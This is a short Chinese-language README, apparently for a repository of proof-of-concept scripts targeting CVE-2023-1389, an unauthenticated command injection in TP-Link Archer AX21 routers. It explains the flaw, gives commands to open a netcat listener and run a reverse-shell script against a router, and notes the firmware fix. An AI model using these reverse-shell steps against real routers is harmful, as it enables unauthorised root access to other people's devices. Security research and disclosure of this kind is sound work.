
CVE-2023-1389 的概念验证脚本,针对 TP-Link Archer AX21 中的未认证命令注入漏洞,提供文件传输和反向 Shell 功能。
CVE-2023–1389 是 TP-Link Archer AX21 WiFi 路由器中的一个无需身份验证的命令注入漏洞。country 参数中的一个回调使用了 popen() 函数,该函数以 root 权限运行,从而允许攻击者通过向管理界面发送 GET 或 POST 请求注入任意值,而无需身份验证。有关该漏洞的更多详细信息,请参见此处。
这些是我在探索该命令注入时创建的几个概念验证(PoC)脚本。Archer-file-transfer.py 是第一个迭代版本,其实现交互的方式相当复杂。Archer-rev-shell.py 为你提供了一个简单的 netcat 反向 shell,很可能正是你所需要的那个。如果你想进一步了解这些脚本的开发过程,可以阅读此处的文章。
在一个终端窗口中:
nc your_IP listener_port
在第二个终端窗口中:
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
TP-Link 已发布固件版本 1.1.4 Build 20230219,通过移除易受攻击的回调来修复该问题。将路由器更新到最新固件可保护你的设备。
我可能不会维护这些 PoC。这两个脚本都非常简单,应该可以根据需要轻松修改。